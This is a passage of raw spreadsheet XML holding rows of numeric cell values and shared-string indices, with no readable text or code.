      <c r="A21374" s="1">
        <v>6494.0</v>
      </c>
      <c r="B21374" s="2">
        <v>4.8697423E7</v>
      </c>
      <c r="C21374" s="2" t="s">
        <v>20632</v>
      </c>
      <c r="D21374" s="2">
        <v>1.0</v>
      </c>
      <c r="E21374" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21374" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21375" ht="15.75" customHeight="1">
      <c r="A21375" s="1">
        <v>6789.0</v>
      </c>
      <c r="B21375" s="2">
        <v>4.9500361E7</v>
      </c>
      <c r="C21375" s="2" t="s">
        <v>20633</v>
      </c>
      <c r="D21375" s="2">
        <v>1.0</v>
      </c>
      <c r="E21375" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21375" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21376" ht="15.75" customHeight="1">
      <c r="A21376" s="1">
        <v>7064.0</v>
      </c>
      <c r="B21376" s="2">
        <v>5.0233089E7</v>
      </c>
      <c r="C21376" s="2" t="s">
        <v>20634</v>
      </c>
      <c r="D21376" s="2">
        <v>1.0</v>
      </c>
      <c r="E21376" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21376" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21377" ht="15.75" customHeight="1">
      <c r="A21377" s="1">
        <v>7444.0</v>
      </c>
      <c r="B21377" s="2">
        <v>5.12178E7</v>
      </c>
      <c r="C21377" s="2" t="s">
        <v>20635</v>
      </c>
      <c r="D21377" s="2">
        <v>1.0</v>
      </c>
      <c r="E21377" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21377" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21378" ht="15.75" customHeight="1">
      <c r="A21378" s="1">
        <v>8432.0</v>
      </c>
      <c r="B21378" s="2">
        <v>5.3946286E7</v>
      </c>
      <c r="C21378" s="2" t="s">
        <v>20636</v>
      </c>
      <c r="D21378" s="2">
        <v>1.0</v>
      </c>
      <c r="E21378" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21378" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21379" ht="15.75" customHeight="1">
      <c r="A21379" s="1">
        <v>9179.0</v>
      </c>
      <c r="B21379" s="2">
        <v>5.5373391E7</v>
      </c>
      <c r="C21379" s="2" t="s">
        <v>20637</v>
      </c>
      <c r="D21379" s="2">
        <v>1.0</v>
      </c>
      <c r="E21379" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21379" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21380" ht="15.75" customHeight="1">
      <c r="A21380" s="1">
        <v>9359.0</v>
      </c>
      <c r="B21380" s="2">
        <v>5.5678021E7</v>
      </c>
      <c r="C21380" s="2" t="s">
        <v>20638</v>
      </c>
      <c r="D21380" s="2">
        <v>1.0</v>
      </c>
      <c r="E21380" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21380" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21381" ht="15.75" customHeight="1">
      <c r="A21381" s="1">
        <v>10987.0</v>
      </c>
      <c r="B21381" s="2">
        <v>1.7410904E7</v>
      </c>
      <c r="C21381" s="2" t="s">
        <v>20639</v>
      </c>
      <c r="D21381" s="2">
        <v>1.0</v>
      </c>
      <c r="E21381" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21381" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21382" ht="15.75" customHeight="1">
      <c r="A21382" s="1">
        <v>11192.0</v>
      </c>
      <c r="B21382" s="2">
        <v>1.9864053E7</v>
      </c>
      <c r="C21382" s="2" t="s">
        <v>20640</v>
      </c>
      <c r="D21382" s="2">
        <v>1.0</v>
      </c>
      <c r="E21382" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21382" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21383" ht="15.75" customHeight="1">
      <c r="A21383" s="1">
        <v>11288.0</v>
      </c>
      <c r="B21383" s="2">
        <v>2.0886894E7</v>
      </c>
      <c r="C21383" s="2" t="s">
        <v>20641</v>
      </c>
      <c r="D21383" s="2">
        <v>1.0</v>
      </c>
      <c r="E21383" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21383" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21384" ht="15.75" customHeight="1">
      <c r="A21384" s="1">
        <v>11881.0</v>
      </c>
      <c r="B21384" s="2">
        <v>2.5049238E7</v>
      </c>
      <c r="C21384" s="2" t="s">
        <v>20642</v>
      </c>
      <c r="D21384" s="2">
        <v>1.0</v>
      </c>
      <c r="E21384" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21384" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21385" ht="15.75" customHeight="1">
      <c r="A21385" s="1">
        <v>12438.0</v>
      </c>
      <c r="B21385" s="2">
        <v>2.9241504E7</v>
      </c>
      <c r="C21385" s="2" t="s">
        <v>20643</v>
      </c>
      <c r="D21385" s="2">
        <v>1.0</v>
      </c>
      <c r="E21385" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21385" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21386" ht="15.75" customHeight="1">
      <c r="A21386" s="1">
        <v>13668.0</v>
      </c>
      <c r="B21386" s="2">
        <v>3.6018025E7</v>
      </c>
      <c r="C21386" s="2" t="s">
        <v>20644</v>
      </c>
      <c r="D21386" s="2">
        <v>1.0</v>
      </c>
      <c r="E21386" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21386" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21387" ht="15.75" customHeight="1">
      <c r="A21387" s="1">
        <v>13978.0</v>
      </c>
      <c r="B21387" s="2">
        <v>3.7344915E7</v>
      </c>
      <c r="C21387" s="2" t="s">
        <v>20645</v>
      </c>
      <c r="D21387" s="2">
        <v>1.0</v>
      </c>
      <c r="E21387" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21387" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21388" ht="15.75" customHeight="1">
      <c r="A21388" s="1">
        <v>14801.0</v>
      </c>
      <c r="B21388" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C21388" s="2" t="s">
        <v>20646</v>
      </c>
      <c r="D21388" s="2">
        <v>1.0</v>
      </c>
      <c r="E21388" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21388" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21389" ht="15.75" customHeight="1">
      <c r="A21389" s="1">
        <v>16684.0</v>
      </c>
      <c r="B21389" s="2">
        <v>4.7309159E7</v>
      </c>
      <c r="C21389" s="2" t="s">
        <v>20647</v>
      </c>
      <c r="D21389" s="2">
        <v>1.0</v>
      </c>
      <c r="E21389" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21389" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21390" ht="15.75" customHeight="1">
      <c r="A21390" s="1">
        <v>17685.0</v>
      </c>
      <c r="B21390" s="2">
        <v>5.0496741E7</v>
      </c>
      <c r="C21390" s="2" t="s">
        <v>20648</v>
      </c>
      <c r="D21390" s="2">
        <v>1.0</v>
      </c>
      <c r="E21390" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21390" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21391" ht="15.75" customHeight="1">
      <c r="A21391" s="1">
        <v>19272.0</v>
      </c>
      <c r="B21391" s="2">
        <v>5.5160921E7</v>
      </c>
      <c r="C21391" s="2" t="s">
        <v>20649</v>
      </c>
      <c r="D21391" s="2">
        <v>1.0</v>
      </c>
      <c r="E21391" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21391" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21392" ht="15.75" customHeight="1">
      <c r="A21392" s="1">
        <v>21182.0</v>
      </c>
      <c r="B21392" s="2">
        <v>1.9192318E7</v>
      </c>
      <c r="C21392" s="2" t="s">
        <v>20650</v>
      </c>
      <c r="D21392" s="2">
        <v>1.0</v>
      </c>
      <c r="E21392" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21392" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21393" ht="15.75" customHeight="1">
      <c r="A21393" s="1">
        <v>21843.0</v>
      </c>
      <c r="B21393" s="2">
        <v>2.7140507E7</v>
      </c>
      <c r="C21393" s="2" t="s">
        <v>20651</v>
      </c>
      <c r="D21393" s="2">
        <v>1.0</v>
      </c>
      <c r="E21393" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21393" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21394" ht="15.75" customHeight="1">
      <c r="A21394" s="1">
        <v>23249.0</v>
      </c>
      <c r="B21394" s="2">
        <v>5309597.0</v>
      </c>
      <c r="C21394" s="2" t="s">
        <v>20652</v>
      </c>
      <c r="D21394" s="2">
        <v>1.0</v>
      </c>
      <c r="E21394" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21394" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21395" ht="15.75" customHeight="1">
      <c r="A21395" s="1">
        <v>24840.0</v>
      </c>
      <c r="B21395" s="2">
        <v>1.2175394E7</v>
      </c>
      <c r="C21395" s="2" t="s">
        <v>20653</v>
      </c>
      <c r="D21395" s="2">
        <v>1.0</v>
      </c>
      <c r="E21395" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21395" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21396" ht="15.75" customHeight="1">
      <c r="A21396" s="1">
        <v>26122.0</v>
      </c>
      <c r="B21396" s="2">
        <v>1.5912121E7</v>
      </c>
      <c r="C21396" s="2" t="s">
        <v>20654</v>
      </c>
      <c r="D21396" s="2">
        <v>1.0</v>
      </c>
      <c r="E21396" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21396" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21397" ht="15.75" customHeight="1">
      <c r="A21397" s="1">
        <v>26440.0</v>
      </c>
      <c r="B21397" s="2">
        <v>1.7255509E7</v>
      </c>
      <c r="C21397" s="2" t="s">
        <v>20655</v>
      </c>
      <c r="D21397" s="2">
        <v>1.0</v>
      </c>
      <c r="E21397" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21397" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21398" ht="15.75" customHeight="1">
      <c r="A21398" s="1">
        <v>26452.0</v>
      </c>
      <c r="B21398" s="2">
        <v>1.7310781E7</v>
      </c>
      <c r="C21398" s="2" t="s">
        <v>20656</v>
      </c>
      <c r="D21398" s="2">
        <v>1.0</v>
      </c>
      <c r="E21398" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21398" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21399" ht="15.75" customHeight="1">
      <c r="A21399" s="1">
        <v>28612.0</v>
      </c>
      <c r="B21399" s="2">
        <v>2.7140506E7</v>
      </c>
      <c r="C21399" s="2" t="s">
        <v>20651</v>
      </c>
      <c r="D21399" s="2">
        <v>1.0</v>
      </c>
      <c r="E21399" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21399" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21400" ht="15.75" customHeight="1">
      <c r="A21400" s="1">
        <v>29366.0</v>
      </c>
      <c r="B21400" s="2">
        <v>3.1663316E7</v>
      </c>
      <c r="C21400" s="2" t="s">
        <v>20657</v>
      </c>
      <c r="D21400" s="2">
        <v>1.0</v>
      </c>
      <c r="E21400" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21400" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21401" ht="15.75" customHeight="1">
      <c r="A21401" s="1">
        <v>30370.0</v>
      </c>
      <c r="B21401" s="2">
        <v>3.8391485E7</v>
      </c>
      <c r="C21401" s="2" t="s">
        <v>20658</v>
      </c>
      <c r="D21401" s="2">
        <v>1.0</v>
      </c>
      <c r="E21401" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21401" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21402" ht="15.75" customHeight="1">
      <c r="A21402" s="1">
        <v>32670.0</v>
      </c>
      <c r="B21402" s="2">
        <v>5933304.0</v>
      </c>
      <c r="C21402" s="2" t="s">
        <v>20659</v>
      </c>
      <c r="D21402" s="2">
        <v>1.0</v>
      </c>
      <c r="E21402" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21402" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21403" ht="15.75" customHeight="1">
      <c r="A21403" s="1">
        <v>33932.0</v>
      </c>
      <c r="B21403" s="2">
        <v>9281929.0</v>
      </c>
      <c r="C21403" s="2" t="s">
        <v>20660</v>
      </c>
      <c r="D21403" s="2">
        <v>1.0</v>
      </c>
      <c r="E21403" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21403" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21404" ht="15.75" customHeight="1">
      <c r="A21404" s="1">
        <v>3546.0</v>
      </c>
      <c r="B21404" s="2">
        <v>3.8747691E7</v>
      </c>
      <c r="C21404" s="2" t="s">
        <v>20661</v>
      </c>
      <c r="D21404" s="2">
        <v>1.0</v>
      </c>
      <c r="E21404" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21404" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21405" ht="15.75" customHeight="1">
      <c r="A21405" s="1">
        <v>4802.0</v>
      </c>
      <c r="B21405" s="2">
        <v>4.3514235E7</v>
      </c>
      <c r="C21405" s="2" t="s">
        <v>20662</v>
      </c>
      <c r="D21405" s="2">
        <v>1.0</v>
      </c>
      <c r="E21405" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21405" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21406" ht="15.75" customHeight="1">
      <c r="A21406" s="1">
        <v>5784.0</v>
      </c>
      <c r="B21406" s="2">
        <v>4.6753912E7</v>
      </c>
      <c r="C21406" s="2" t="s">
        <v>20663</v>
      </c>
      <c r="D21406" s="2">
        <v>1.0</v>
      </c>
      <c r="E21406" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21406" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21407" ht="15.75" customHeight="1">
      <c r="A21407" s="1">
        <v>10442.0</v>
      </c>
      <c r="B21407" s="2">
        <v>1.0450338E7</v>
      </c>
      <c r="C21407" s="2" t="s">
        <v>20664</v>
      </c>
      <c r="D21407" s="2">
        <v>1.0</v>
      </c>
      <c r="E21407" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21407" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21408" ht="15.75" customHeight="1">
      <c r="A21408" s="1">
        <v>11479.0</v>
      </c>
      <c r="B21408" s="2">
        <v>2.1976515E7</v>
      </c>
      <c r="C21408" s="2" t="s">
        <v>20665</v>
      </c>
      <c r="D21408" s="2">
        <v>1.0</v>
      </c>
      <c r="E21408" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21408" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21409" ht="15.75" customHeight="1">
      <c r="A21409" s="1">
        <v>12619.0</v>
      </c>
      <c r="B21409" s="2">
        <v>3.0217796E7</v>
      </c>
      <c r="C21409" s="2" t="s">
        <v>20666</v>
      </c>
      <c r="D21409" s="2">
        <v>1.0</v>
      </c>
      <c r="E21409" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21409" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21410" ht="15.75" customHeight="1">
      <c r="A21410" s="1">
        <v>13341.0</v>
      </c>
      <c r="B21410" s="2">
        <v>3.4690743E7</v>
      </c>
      <c r="C21410" s="2" t="s">
        <v>20667</v>
      </c>
      <c r="D21410" s="2">
        <v>1.0</v>
      </c>
      <c r="E21410" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21410" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21411" ht="15.75" customHeight="1">
      <c r="A21411" s="1">
        <v>19389.0</v>
      </c>
      <c r="B21411" s="2">
        <v>5.5538867E7</v>
      </c>
      <c r="C21411" s="2" t="s">
        <v>20668</v>
      </c>
      <c r="D21411" s="2">
        <v>1.0</v>
      </c>
      <c r="E21411" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21411" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21412" ht="15.75" customHeight="1">
      <c r="A21412" s="1">
        <v>19891.0</v>
      </c>
      <c r="B21412" s="2">
        <v>5.7286928E7</v>
      </c>
      <c r="C21412" s="2" t="s">
        <v>20669</v>
      </c>
      <c r="D21412" s="2">
        <v>1.0</v>
      </c>
      <c r="E21412" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21412" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21413" ht="15.75" customHeight="1">
      <c r="A21413" s="1">
        <v>23684.0</v>
      </c>
      <c r="B21413" s="2">
        <v>6996012.0</v>
      </c>
      <c r="C21413" s="2" t="s">
        <v>20670</v>
      </c>
      <c r="D21413" s="2">
        <v>1.0</v>
      </c>
      <c r="E21413" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21413" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21414" ht="15.75" customHeight="1">
      <c r="A21414" s="1">
        <v>33626.0</v>
      </c>
      <c r="B21414" s="2">
        <v>8356081.0</v>
      </c>
      <c r="C21414" s="2" t="s">
        <v>20671</v>
      </c>
      <c r="D21414" s="2">
        <v>1.0</v>
      </c>
      <c r="E21414" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21414" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="21415" ht="15.75" customHeight="1">
      <c r="A21415" s="1">
        <v>48.0</v>
      </c>
      <c r="B21415" s="2">
        <v>1.0903235E7</v>
      </c>
      <c r="C21415" s="2" t="s">
        <v>20672</v>
      </c>
      <c r="D21415" s="2">
        <v>1.0</v>
      </c>
      <c r="E21415" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21415" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="21416" ht="15.75" customHeight="1">
      <c r="A21416" s="1">
        <v>2906.0</v>
      </c>
      <c r="B21416" s="2">
        <v>3.5812447E7</v>
      </c>
      <c r="C21416" s="2" t="s">
        <v>20673</v>
      </c>
      <c r="D21416" s="2">
        <v>1.0</v>
      </c>
      <c r="E21416" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21416" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="21417" ht="15.75" customHeight="1">
      <c r="A21417" s="1">
        <v>4558.0</v>
      </c>
      <c r="B21417" s="2">
        <v>4.271071E7</v>
      </c>
      <c r="C21417" s="2" t="s">
        <v>20674</v>
      </c>
      <c r="D21417" s="2">
        <v>1.0</v>
      </c>
      <c r="E21417" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21417" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="21418" ht="15.75" customHeight="1">
      <c r="A21418" s="1">
        <v>6339.0</v>
      </c>
      <c r="B21418" s="2">
        <v>4.8306299E7</v>
      </c>
      <c r="C21418" s="2" t="s">
        <v>20675</v>
      </c>
      <c r="D21418" s="2">
        <v>1.0</v>
      </c>
      <c r="E21418" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21418" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="21419" ht="15.75" customHeight="1">
      <c r="A21419" s="1">
        <v>7547.0</v>
      </c>
      <c r="B21419" s="2">
        <v>5.150057E7</v>
      </c>
      <c r="C21419" s="2" t="s">
        <v>20676</v>
      </c>
      <c r="D21419" s="2">
        <v>1.0</v>
      </c>
      <c r="E21419" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21419" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="21420" ht="15.75" customHeight="1">
      <c r="A21420" s="1">
        <v>18718.0</v>
      </c>
      <c r="B21420" s="2">
        <v>5.3669348E7</v>
      </c>
      <c r="C21420" s="2" t="s">
        <v>20677</v>
      </c>
      <c r="D21420" s="2">
        <v>1.0</v>
      </c>
      <c r="E21420" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21420" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="21421" ht="15.75" customHeight="1">
      <c r="A21421" s="1">
        <v>9429.0</v>
      </c>
      <c r="B21421" s="2">
        <v>5.5797227E7</v>
      </c>
      <c r="C21421" s="2" t="s">
        <v>20678</v>
      </c>
      <c r="D21421" s="2">
        <v>1.0</v>
      </c>
      <c r="E21421" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21421" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="21422" ht="15.75" customHeight="1">
      <c r="A21422" s="1">
        <v>10581.0</v>
      </c>
      <c r="B21422" s="2">
        <v>1.317385E7</v>
      </c>
      <c r="C21422" s="2" t="s">
        <v>20679</v>
      </c>
      <c r="D21422" s="2">
        <v>1.0</v>
      </c>
      <c r="E21422" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21422" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="21423" ht="15.75" customHeight="1">
      <c r="A21423" s="1">
        <v>11643.0</v>
      </c>
      <c r="B21423" s="2">
        <v>2.3221384E7</v>
      </c>
      <c r="C21423" s="2" t="s">
        <v>20680</v>
      </c>
      <c r="D21423" s="2">
        <v>1.0</v>
      </c>
      <c r="E21423" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21423" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="21424" ht="15.75" customHeight="1">
      <c r="A21424" s="1">
        <v>12179.0</v>
      </c>
      <c r="B21424" s="2">
        <v>2.7457463E7</v>
      </c>
      <c r="C21424" s="2" t="s">
        <v>20681</v>
      </c>
      <c r="D21424" s="2">
        <v>1.0</v>
      </c>
      <c r="E21424" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21424" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="21425" ht="15.75" customHeight="1">
      <c r="A21425" s="1">
        <v>14042.0</v>
      </c>
      <c r="B21425" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C21425" s="2" t="s">
        <v>20682</v>
      </c>
      <c r="D21425" s="2">
        <v>1.0</v>
      </c>
      <c r="E21425" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21425" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="21426" ht="15.75" customHeight="1">
      <c r="A21426" s="1">
        <v>2608.0</v>
      </c>
      <c r="B21426" s="2">
        <v>3.4423937E7</v>
      </c>
      <c r="C21426" s="2" t="s">
        <v>20683</v>
      </c>
      <c r="D21426" s="2">
        <v>1.0</v>
      </c>
      <c r="E21426" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21426" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="21427" ht="15.75" customHeight="1">
      <c r="A21427" s="1">
        <v>1993.0</v>
      </c>
      <c r="B21427" s="2">
        <v>3.0531423E7</v>
      </c>
      <c r="C21427" s="2" t="s">
        <v>20684</v>
      </c>
      <c r="D21427" s="2">
        <v>1.0</v>
      </c>
      <c r="E21427" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21427" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="21428" ht="15.75" customHeight="1">
      <c r="A21428" s="1">
        <v>3291.0</v>
      </c>
      <c r="B21428" s="2">
        <v>3.7513189E7</v>
      </c>
      <c r="C21428" s="2" t="s">
        <v>20685</v>
      </c>
      <c r="D21428" s="2">
        <v>1.0</v>
      </c>
      <c r="E21428" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21428" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="21429" ht="15.75" customHeight="1">
      <c r="A21429" s="1">
        <v>4090.0</v>
      </c>
      <c r="B21429" s="2">
        <v>4.1241718E7</v>
      </c>
      <c r="C21429" s="2" t="s">
        <v>20686</v>
      </c>
      <c r="D21429" s="2">
        <v>1.0</v>
      </c>
      <c r="E21429" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21429" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="21430" ht="15.75" customHeight="1">
      <c r="A21430" s="1">
        <v>5279.0</v>
      </c>
      <c r="B21430" s="2">
        <v>4.5171372E7</v>
      </c>
      <c r="C21430" s="2" t="s">
        <v>20687</v>
      </c>
      <c r="D21430" s="2">
        <v>1.0</v>
      </c>
      <c r="E21430" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21430" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="21431" ht="15.75" customHeight="1">
      <c r="A21431" s="1">
        <v>12751.0</v>
      </c>
      <c r="B21431" s="2">
        <v>3.1125862E7</v>
      </c>
      <c r="C21431" s="2" t="s">
        <v>20688</v>
      </c>
      <c r="D21431" s="2">
        <v>1.0</v>
      </c>
      <c r="E21431" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21431" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="21432" ht="15.75" customHeight="1">
      <c r="A21432" s="1">
        <v>15283.0</v>
      </c>
      <c r="B21432" s="2">
        <v>4.2405474E7</v>
      </c>
      <c r="C21432" s="2" t="s">
        <v>20689</v>
      </c>
      <c r="D21432" s="2">
        <v>1.0</v>
      </c>
      <c r="E21432" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21432" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="21433" ht="15.75" customHeight="1">
      <c r="A21433" s="1">
        <v>18565.0</v>
      </c>
      <c r="B21433" s="2">
        <v>5.3194367E7</v>
      </c>
      <c r="C21433" s="2" t="s">
        <v>20690</v>
      </c>
      <c r="D21433" s="2">
        <v>1.0</v>
      </c>
      <c r="E21433" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21433" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="21434" ht="15.75" customHeight="1">
      <c r="A21434" s="1">
        <v>19381.0</v>
      </c>
      <c r="B21434" s="2">
        <v>5.5499676E7</v>
      </c>
      <c r="C21434" s="2" t="s">
        <v>20691</v>
      </c>
      <c r="D21434" s="2">
        <v>1.0</v>
      </c>
      <c r="E21434" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21434" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="21435" ht="15.75" customHeight="1">
      <c r="A21435" s="1">
        <v>5883.0</v>
      </c>
      <c r="B21435" s="2">
        <v>4.7073493E7</v>
      </c>
      <c r="C21435" s="2" t="s">
        <v>20692</v>
      </c>
      <c r="D21435" s="2">
        <v>1.0</v>
      </c>
      <c r="E21435" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21435" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21436" ht="15.75" customHeight="1">
      <c r="A21436" s="1">
        <v>8753.0</v>
      </c>
      <c r="B21436" s="2">
        <v>5.4564528E7</v>
      </c>
      <c r="C21436" s="2" t="s">
        <v>20693</v>
      </c>
      <c r="D21436" s="2">
        <v>1.0</v>
      </c>
      <c r="E21436" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21436" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21437" ht="15.75" customHeight="1">
      <c r="A21437" s="1">
        <v>9681.0</v>
      </c>
      <c r="B21437" s="2">
        <v>5.6327007E7</v>
      </c>
      <c r="C21437" s="2" t="s">
        <v>20694</v>
      </c>
      <c r="D21437" s="2">
        <v>1.0</v>
      </c>
      <c r="E21437" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21437" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21438" ht="15.75" customHeight="1">
      <c r="A21438" s="1">
        <v>10603.0</v>
      </c>
      <c r="B21438" s="2">
        <v>1.3612372E7</v>
      </c>
      <c r="C21438" s="2" t="s">
        <v>20695</v>
      </c>
      <c r="D21438" s="2">
        <v>1.0</v>
      </c>
      <c r="E21438" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21438" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21439" ht="15.75" customHeight="1">
      <c r="A21439" s="1">
        <v>14822.0</v>
      </c>
      <c r="B21439" s="2">
        <v>4.0960944E7</v>
      </c>
      <c r="C21439" s="2" t="s">
        <v>20696</v>
      </c>
      <c r="D21439" s="2">
        <v>1.0</v>
      </c>
      <c r="E21439" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21439" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21440" ht="15.75" customHeight="1">
      <c r="A21440" s="1">
        <v>15826.0</v>
      </c>
      <c r="B21440" s="2">
        <v>4.4309795E7</v>
      </c>
      <c r="C21440" s="2" t="s">
        <v>20697</v>
      </c>
      <c r="D21440" s="2">
        <v>1.0</v>
      </c>
      <c r="E21440" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21440" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21441" ht="15.75" customHeight="1">
